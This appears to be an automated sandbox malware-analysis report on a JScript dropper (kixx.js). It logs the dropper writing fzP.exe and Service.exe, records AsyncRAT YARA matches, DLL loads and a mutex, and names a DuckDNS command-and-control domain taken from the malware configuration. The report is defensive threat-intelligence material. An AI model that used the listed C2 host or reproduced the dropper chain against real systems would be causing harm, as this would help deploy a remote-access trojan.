Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: fzP.exe, 00000002.00000002.2049097834.0000000005860000.00000004.08000000.00040000.00000000.sdmp, fzP.exe, 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000269A000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002716000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002655000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000275E000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002657000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000271D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030AD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: fzP.exe, 00000002.00000002.2049097834.0000000005860000.00000004.08000000.00040000.00000000.sdmp, fzP.exe, 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000269A000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002716000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002655000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000275E000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002657000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000271D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030AD000.00000004.00000800.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: kizitodavina.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: kizitodavina.duckdns.org

Source: unknown

DNS traffic detected: query: kizitodavina.duckdns.org replaycode: Server failure (2)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: kizitodavina.duckdns.org

Source: fzP.exe, 00000007.00000002.2187124277.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: http://go.micj

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.fzP.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.fzP.exe.3232718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2ddc78c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.fzP.exe.3235fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2ddab48.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.fzP.exe.3234350.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2dde3e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2cd2728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.fzP.exe.2bda998.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.fzP.exe.2bdc5f4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2cd4360.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.2cd5fbc.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.fzP.exe.2bd8d54.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 2_2_030D0D33	2_2_030D0D33
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 3_2_0262D504	3_2_0262D504
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD7288	4_2_02AD7288
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD5208	4_2_02AD5208
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD43D0	4_2_02AD43D0
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD6450	4_2_02AD6450
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD0D32	4_2_02AD0D32
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD727C	4_2_02AD727C
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 4_2_02AD61C8	4_2_02AD61C8
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 8_2_00EA0ECB	8_2_00EA0ECB
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 9_2_00E80EC0	9_2_00E80EC0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B43E0	11_2_011B43E0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B5218	11_2_011B5218
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B7288	11_2_011B7288
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B0D40	11_2_011B0D40
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B6450	11_2_011B6450
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B61C8	11_2_011B61C8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B43D0	11_2_011B43D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B5208	11_2_011B5208
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B7279	11_2_011B7279
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_011B0D33	11_2_011B0D33
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 12_2_00D40EC0	12_2_00D40EC0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 14_2_00BC0ECB	14_2_00BC0ECB
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E5212	17_2_023E5212
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E7288	17_2_023E7288
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E43D0	17_2_023E43D0
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E6450	17_2_023E6450
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E0D32	17_2_023E0D32
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 17_2_023E7279	17_2_023E7279
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Code function: 22_2_00860EE0	22_2_00860EE0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE7288	23_2_02DE7288
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE5212	23_2_02DE5212
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE43D0	23_2_02DE43D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE6450	23_2_02DE6450
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE0D30	23_2_02DE0D30
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE7279	23_2_02DE7279
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE6080	23_2_02DE6080
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 23_2_02DE61C8	23_2_02DE61C8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_009F0ECB	24_2_009F0ECB

Source: kixx.js

Initial sample: Strings found which are bigger than 50

Source: 5.2.fzP.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.fzP.exe.3232718.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2ddc78c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.fzP.exe.3235fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2ddab48.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.fzP.exe.3234350.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2dde3e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2cd2728.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.fzP.exe.2bda998.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.fzP.exe.2bdc5f4.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2cd4360.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.2cd5fbc.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.fzP.exe.2bd8d54.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: fzP.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: fzP.exe.0.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1af3297ee40.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1af32851b90.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1af3297ee40.1.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.2.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winJS@48/5@4/0

Source: C:\Users\user\AppData\Local\Temp\fzP.exe

File created: C:\Users\user\AppData\Roaming\Service.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Service.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Mutant created: \Sessions\1\BaseNamedObjects\oTbTivRCYmlY7umi

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\fzP.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kixx.js	ReversingLabs: Detection: 34%
Source: kixx.js	Virustotal: Detection: 20%

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
